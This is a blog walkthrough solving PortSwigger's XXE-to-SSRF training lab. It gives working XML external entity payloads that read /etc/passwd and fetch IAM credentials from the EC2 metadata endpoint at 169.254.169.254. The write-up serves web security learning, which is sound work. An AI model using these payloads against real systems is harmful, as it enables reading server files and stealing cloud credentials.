In this post we will walk step by step through how to solve Exploiting XXE to perform SSRF attacks on PortSwigger Academy. This lab’s difficulty is Practitioner and it is the second lab in the XXE injection labs on Portswigger.

Link to lab: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint. at http://169.254.169.254.

To start the lab click the ‘Access the Lab’ button. A modern browser and either Burp Suite Community or Professional Edition is all we need to solve this lab.

As we begin the lab we encounter a shop page showcasing different products. It’s worth noting that the products may differ from the screenshot as PortSwigger Labs can vary the content with each lab session. So, don’t worry if your products look different.

Clicking on one of the products we can see a image of the product, a description, and the ability to check Stock based off of location.

Clicking the Check stock button returns a value indicating the number of units.

Viewing this HTTP Request shows the check product stock uses XML to return the data.

Using the same payload from the Exploiting XXE using external entities to retrieve files lab we can obtain the contents of the /etc/passwd. If you are curious how the payload works I have detailed notes about it there as well.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE Payload [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> 
<stockCheck>
    <productId> &xxe; </productId> 
    <storeId> 1 </storeId> 
</stockCheck>

We need to change file:///etc/passwd to http://169.254.169.254/latest/meta-data/iam/security-credentials/admin. The way I found this was through this blog post, if you are interested. We just need to adjust ROLENAME to admin.

This allows us to obtain the server’s IAM secret access key from the EC2 metadata endpoint using the following payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Payload [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

After obtaining the IAM secret access key we have successfully solved the lab!

That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!

Jarrod